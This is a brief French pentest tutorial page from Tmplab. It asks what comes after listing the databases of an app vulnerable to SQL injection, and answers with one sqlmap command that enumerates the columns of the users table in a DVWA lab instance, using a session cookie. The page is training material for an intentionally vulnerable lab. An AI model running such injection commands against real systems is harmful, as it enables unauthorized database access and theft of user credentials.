Pentest101

From Tmplab

Crash course


On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?

sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns